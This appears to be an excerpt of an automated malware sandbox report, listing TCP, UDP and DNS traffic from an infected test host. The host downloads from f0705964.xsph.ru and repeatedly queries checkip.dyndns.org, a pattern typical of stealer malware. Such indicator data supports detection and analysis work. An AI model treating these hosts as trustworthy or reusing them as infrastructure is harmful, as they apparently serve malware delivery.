Aug 23, 2022 13:42:52.833571911 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.833590031 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.833620071 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.833636045 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.833647013 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.833673000 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.833688021 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.833703041 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.833729982 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.833741903 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.833755016 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.833780050 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.833796978 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.833806992 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.833833933 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.833856106 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.833858967 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.833884001 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.833898067 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.833909035 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.833937883 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.833951950 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.833965063 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.833992958 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.834002972 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.834021091 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.834047079 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.834060907 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.834074974 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.834100008 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.834121943 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.834131002 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.834161997 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.834172010 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.834188938 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.834217072 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.834228992 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.834244013 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.834271908 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.834294081 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.834299088 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.834325075 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.834336996 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.834352016 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.834376097 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.834392071 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.834400892 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.834425926 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.834434986 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.834450960 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.834477901 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.834487915 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.834503889 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.834527969 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.834541082 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.834553003 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.834578037 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.834588051 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.834602118 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.834629059 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.834645987 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.834654093 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.834680080 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.834697962 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.834707022 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.834747076 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.887386084 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.887418985 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.887434959 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.887445927 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.887471914 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.887492895 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.887545109 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.887564898 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.887583971 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.887597084 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.887603045 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.887622118 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.887622118 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.887636900 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.887641907 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.887660980 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.887680054 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.887682915 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.887700081 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.887718916 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.887738943 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.887742996 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.887758970 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.887758970 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.887778044 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.887795925 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.887797117 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.887818098 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.887836933 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.887840033 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.887856960 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.887878895 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.887881994 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.887906075 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.887923002 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.887924910 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.887964964 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.887979984 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.888084888 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.891961098 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.891993046 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.892019987 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.892040014 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.892059088 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.892077923 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.892096043 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.892115116 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.892122030 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.892133951 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.892142057 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.892153978 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.892172098 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.892174959 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.892190933 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.892210007 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.892210960 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.892230034 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.892249107 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.892256021 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.892266989 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.892282009 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.892286062 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.892328024 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.892334938 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.892354965 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.892374039 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.892393112 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.892398119 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.892412901 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.892430067 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.892433882 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.892453909 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.892472982 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.892472982 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.892493010 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.892512083 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.892514944 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.892532110 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.892550945 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.892551899 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.892570972 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.892591000 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.892591953 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.892611027 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.892631054 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.892636061 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.892649889 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.892661095 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.892683029 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.892702103 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.892720938 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.892723083 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.892745972 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.892765999 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.892765999 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.892807007 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.892827034 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.892848015 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.892868042 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.892889023 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.892889977 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.892910004 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.892930031 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.892930984 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.892951012 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.892966986 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.892971039 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.892991066 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.893008947 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.893011093 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.893030882 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.893050909 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.893060923 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.893069983 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.893086910 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.893089056 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.893110037 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.893129110 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.893131018 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.893150091 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.893167019 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.893167973 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.893188000 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.893207073 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.893210888 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.893227100 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.893248081 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.893249035 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.893266916 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.893285990 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.893285990 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.893306017 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.893326044 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.893326044 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.893346071 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.893364906 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.893367052 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.893384933 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.893405914 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.893405914 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.893425941 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.893445969 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.893445969 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.893465996 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.893486023 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.893486977 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.893505096 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.893524885 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.893524885 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.893544912 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.893560886 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.893564939 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.893585920 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.893604994 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.893604994 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.893625021 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.893644094 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.893644094 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.893663883 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.893681049 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:52.893682003 CEST	80	49172	141.8.192.151	192.168.2.22
Aug 23, 2022 13:42:52.893723011 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:42:53.170523882 CEST	49172	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:43:14.053689003 CEST	49173	80	192.168.2.22	132.226.8.169
Aug 23, 2022 13:43:14.344074965 CEST	80	49173	132.226.8.169	192.168.2.22
Aug 23, 2022 13:43:14.344182014 CEST	49173	80	192.168.2.22	132.226.8.169
Aug 23, 2022 13:43:14.345360994 CEST	49173	80	192.168.2.22	132.226.8.169
Aug 23, 2022 13:43:14.636540890 CEST	80	49173	132.226.8.169	192.168.2.22
Aug 23, 2022 13:43:14.637011051 CEST	80	49173	132.226.8.169	192.168.2.22
Aug 23, 2022 13:43:14.845710993 CEST	49173	80	192.168.2.22	132.226.8.169
Aug 23, 2022 13:43:18.786492109 CEST	80	49171	141.8.192.151	192.168.2.22
Aug 23, 2022 13:43:18.786685944 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:43:29.137904882 CEST	49174	80	192.168.2.22	193.122.130.0
Aug 23, 2022 13:43:29.254971981 CEST	80	49174	193.122.130.0	192.168.2.22
Aug 23, 2022 13:43:29.255063057 CEST	49174	80	192.168.2.22	193.122.130.0
Aug 23, 2022 13:43:29.255486965 CEST	49174	80	192.168.2.22	193.122.130.0
Aug 23, 2022 13:43:29.372117043 CEST	80	49174	193.122.130.0	192.168.2.22
Aug 23, 2022 13:43:29.372759104 CEST	80	49174	193.122.130.0	192.168.2.22
Aug 23, 2022 13:43:29.573406935 CEST	49174	80	192.168.2.22	193.122.130.0
Aug 23, 2022 13:43:56.693656921 CEST	49175	80	192.168.2.22	193.122.130.0
Aug 23, 2022 13:43:56.801500082 CEST	80	49175	193.122.130.0	192.168.2.22
Aug 23, 2022 13:43:56.801636934 CEST	49175	80	192.168.2.22	193.122.130.0
Aug 23, 2022 13:43:56.802113056 CEST	49175	80	192.168.2.22	193.122.130.0
Aug 23, 2022 13:43:56.909341097 CEST	80	49175	193.122.130.0	192.168.2.22
Aug 23, 2022 13:43:56.912651062 CEST	80	49175	193.122.130.0	192.168.2.22
Aug 23, 2022 13:43:57.125497103 CEST	49175	80	192.168.2.22	193.122.130.0
Aug 23, 2022 13:44:19.638036013 CEST	80	49173	132.226.8.169	192.168.2.22
Aug 23, 2022 13:44:19.638237000 CEST	49173	80	192.168.2.22	132.226.8.169
Aug 23, 2022 13:44:34.373033047 CEST	80	49174	193.122.130.0	192.168.2.22
Aug 23, 2022 13:44:34.373327017 CEST	49174	80	192.168.2.22	193.122.130.0
Aug 23, 2022 13:44:41.008975983 CEST	49171	80	192.168.2.22	141.8.192.151
Aug 23, 2022 13:44:54.664697886 CEST	49173	80	192.168.2.22	132.226.8.169
Aug 23, 2022 13:44:54.954910040 CEST	80	49173	132.226.8.169	192.168.2.22
Aug 23, 2022 13:45:01.916018963 CEST	80	49175	193.122.130.0	192.168.2.22
Aug 23, 2022 13:45:01.916230917 CEST	49175	80	192.168.2.22	193.122.130.0
Aug 23, 2022 13:45:09.407668114 CEST	49174	80	192.168.2.22	193.122.130.0
Aug 23, 2022 13:45:09.524648905 CEST	80	49174	193.122.130.0	192.168.2.22
Aug 23, 2022 13:45:36.943948030 CEST	49175	80	192.168.2.22	193.122.130.0
Aug 23, 2022 13:45:37.051424026 CEST	80	49175	193.122.130.0	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 23, 2022 13:42:48.224495888 CEST	55868	53	192.168.2.22	8.8.8.8
Aug 23, 2022 13:42:48.254108906 CEST	53	55868	8.8.8.8	192.168.2.22
Aug 23, 2022 13:42:52.293247938 CEST	49688	53	192.168.2.22	8.8.8.8
Aug 23, 2022 13:42:52.322635889 CEST	53	49688	8.8.8.8	192.168.2.22
Aug 23, 2022 13:43:13.836421013 CEST	58836	53	192.168.2.22	8.8.8.8
Aug 23, 2022 13:43:13.855165005 CEST	53	58836	8.8.8.8	192.168.2.22
Aug 23, 2022 13:43:13.966589928 CEST	50134	53	192.168.2.22	8.8.8.8
Aug 23, 2022 13:43:13.984965086 CEST	53	50134	8.8.8.8	192.168.2.22
Aug 23, 2022 13:43:28.999905109 CEST	55275	53	192.168.2.22	8.8.8.8
Aug 23, 2022 13:43:29.018554926 CEST	53	55275	8.8.8.8	192.168.2.22
Aug 23, 2022 13:43:29.073710918 CEST	59915	53	192.168.2.22	8.8.8.8
Aug 23, 2022 13:43:29.092278004 CEST	53	59915	8.8.8.8	192.168.2.22
Aug 23, 2022 13:43:56.593293905 CEST	54408	53	192.168.2.22	8.8.8.8
Aug 23, 2022 13:43:56.611607075 CEST	53	54408	8.8.8.8	192.168.2.22
Aug 23, 2022 13:43:56.632891893 CEST	50108	53	192.168.2.22	8.8.8.8
Aug 23, 2022 13:43:56.651561975 CEST	53	50108	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 23, 2022 13:42:48.224495888 CEST	192.168.2.22	8.8.8.8	0x71ef	Standard query (0)	f0705964.xsph.ru	A (IP address)	IN (0x0001)
Aug 23, 2022 13:42:52.293247938 CEST	192.168.2.22	8.8.8.8	0x7a06	Standard query (0)	f0705964.xsph.ru	A (IP address)	IN (0x0001)
Aug 23, 2022 13:43:13.836421013 CEST	192.168.2.22	8.8.8.8	0xdf4c	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)
Aug 23, 2022 13:43:13.966589928 CEST	192.168.2.22	8.8.8.8	0x9dab	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)
Aug 23, 2022 13:43:28.999905109 CEST	192.168.2.22	8.8.8.8	0xa50b	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)
Aug 23, 2022 13:43:29.073710918 CEST	192.168.2.22	8.8.8.8	0x56f9	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)
Aug 23, 2022 13:43:56.593293905 CEST	192.168.2.22	8.8.8.8	0x17f4	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)
Aug 23, 2022 13:43:56.632891893 CEST	192.168.2.22	8.8.8.8	0x5607	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Aug 23, 2022 13:42:48.254108906 CEST	8.8.8.8	192.168.2.22	0x71ef	No error (0)	f0705964.xsph.ru		141.8.192.151	A (IP address)	IN (0x0001)
Aug 23, 2022 13:42:52.322635889 CEST	8.8.8.8	192.168.2.22	0x7a06	No error (0)	f0705964.xsph.ru		141.8.192.151	A (IP address)	IN (0x0001)
Aug 23, 2022 13:43:13.855165005 CEST	8.8.8.8	192.168.2.22	0xdf4c	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)
Aug 23, 2022 13:43:13.855165005 CEST	8.8.8.8	192.168.2.22	0xdf4c	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)
Aug 23, 2022 13:43:13.855165005 CEST	8.8.8.8	192.168.2.22	0xdf4c	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)
Aug 23, 2022 13:43:13.855165005 CEST	8.8.8.8	192.168.2.22	0xdf4c	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)
Aug 23, 2022 13:43:13.855165005 CEST	8.8.8.8	192.168.2.22	0xdf4c	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)
Aug 23, 2022 13:43:13.855165005 CEST	8.8.8.8	192.168.2.22	0xdf4c	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)
Aug 23, 2022 13:43:13.984965086 CEST	8.8.8.8	192.168.2.22	0x9dab	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)
Aug 23, 2022 13:43:13.984965086 CEST	8.8.8.8	192.168.2.22	0x9dab	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)
Aug 23, 2022 13:43:13.984965086 CEST	8.8.8.8	192.168.2.22	0x9dab	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)
Aug 23, 2022 13:43:13.984965086 CEST	8.8.8.8	192.168.2.22	0x9dab	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)
Aug 23, 2022 13:43:13.984965086 CEST	8.8.8.8	192.168.2.22	0x9dab	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)
Aug 23, 2022 13:43:13.984965086 CEST	8.8.8.8	192.168.2.22	0x9dab	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)
Aug 23, 2022 13:43:29.018554926 CEST	8.8.8.8	192.168.2.22	0xa50b	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)
Aug 23, 2022 13:43:29.018554926 CEST	8.8.8.8	192.168.2.22	0xa50b	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)
Aug 23, 2022 13:43:29.018554926 CEST	8.8.8.8	192.168.2.22	0xa50b	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)
